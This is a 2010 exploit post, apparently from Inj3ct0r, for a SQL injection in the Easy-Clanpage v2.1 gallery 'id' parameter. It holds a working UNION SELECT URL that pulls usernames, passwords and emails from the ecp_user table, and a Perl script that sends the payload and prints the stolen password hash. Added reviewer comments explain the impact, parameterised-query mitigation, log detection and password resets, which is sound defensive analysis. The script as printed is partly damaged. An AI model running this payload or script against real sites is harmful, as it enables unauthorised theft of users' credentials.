Easy-Clanpage <= v2.1 SQL Injection Exploit
Posted on 30 March 2010
===========================================
Easy-Clanpage <= v2.1 SQL Injection Exploit
===========================================
/*----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.1 SQL Injection Exploit
+Author : Easy Laster
+Date : 30.03.2010
+Script Easy-Clanpage <= v2.1
+Download : Update Version 2.01->2.1 http://www.easy-clanpage.de
/?section=downloads&action=viewdl&id=16
+Price : for free
+Language : PHP
+Discovered by Easy Laster
----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=
#SQL Injection
+Exploitable : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=1
+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+ecp_user
+where+userid=1--
-----------------------------------------------------------------------------------------
+Exploit
*/
# Reviewer notes on the advisory header above:
# - Affected input: the `id` query parameter of `?section=gallery&action=kate`
#   in Easy-Clanpage <= v2.1. The advisory names no fixed version.
# - Impact shown by the "Exploitable" URL: a UNION SELECT against `ecp_user`
#   places the username, password and email columns into the gallery page
#   output, so stored credentials and addresses of any userid are readable
#   without authentication.
# - Mitigation: the PHP source is not shown on this page, so this is the
#   general fix for the bug class. Accept only an integer for `id` and bind
#   it as a query parameter instead of concatenating it into the SQL string.
# - Detection: the script below issues a plain GET, so the whole payload sits
#   in the request URL. Search web-server access logs for this route with a
#   non-numeric `id` value (`union`, `select`, `concat(`, `ecp_user`).
# - Response: if such requests are found, treat the password values stored in
#   `ecp_user` as disclosed and force resets.
#!usrinperl
#                                                #
#                                                #
##################################################
# Modules                                        #
#------------------------------------------------#
use strict;                  # Better coding.    #
use warnings;                # Useful warnings.  #
use LWP::Simple;             # procedural interface; provides get() #
##################################################

# What the script does, read straight from the statements below: it prints a
# banner, reads host, path and userid from STDIN, builds one URL against the
# gallery route and fetches it with get(). It then looks for a marker string
# in the response body and prints the 32 characters that follow it.
print " ################################################## # 4004-Security-Project # ################################################## # Easy-Clanpage <= v2.1 SQL Injection # # Exploit # # Using Host+Path+Userid # # www.demo.de /easyclanpage/ 1 # # Easy Laster # ################################################## a ";
my($host,$path,$userid,$request);
my($first,$block,$error,$dir);
$block = " ################################################## ";
$error = "Exploit failed";
print "$block";
print q(Target www.demo.de->);
chomp($host =<STDIN>);
# NOTE(review): `$errora` is not declared anywhere in this listing, so
# `use strict` rejects the script as printed. The page text looks
# extraction-damaged here and in the two checks below.
if ($host eq""){ die "$errora "};
print "$block";
print q(Path /path/ ->);
chomp($path =<STDIN>);
if ($path eq""){ die "$errora ";}
print "$block";
print q(userid->);
chomp($userid =<STDIN>);
if ($userid eq""){ die "$errora ";}
print "$block";
# Query-string prefix of the vulnerable route. The value appended after `id=`
# is the part the application uses unsafely, per the advisory header.
$dir = "?section=gallery&action=kate&id=";
print "<~> Exploiting... ";
$host = "http://".$host.$path;
print "<~> Connecting... ";
# Single GET request. The five 0x23 bytes in concat() are `#` characters, so
# the password column comes back prefixed with the marker "#####" searched
# for below. Only `password` is selected here, unlike the header's example
# URL, which also pulls username and email.
$request = get($host.$dir."1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,password),4,5,6,7+from+ecp_user+where+userid=".$userid."--");
# rindex() returns the position of the last "#####" in the body, or -1.
$first = rindex($request,"#####");
if ($first != -1) {
    print "<~> Exploiting... ";
    print "$block ";
    # Skip the 5-character marker and keep the next 32 characters.
    # NOTE(review): a fixed length of 32 suggests the stored value is a
    # 32-hex-character digest (presumably unsalted MD5). Confirm against the
    # application's schema; if so, migrate to a slow salted password hash.
    $request = substr($request, $first+5, 32);
    print "<~> Hash = $request a";
} else {
    print "<~> $error";
}
# Inj3ct0r.com [2010-03-30]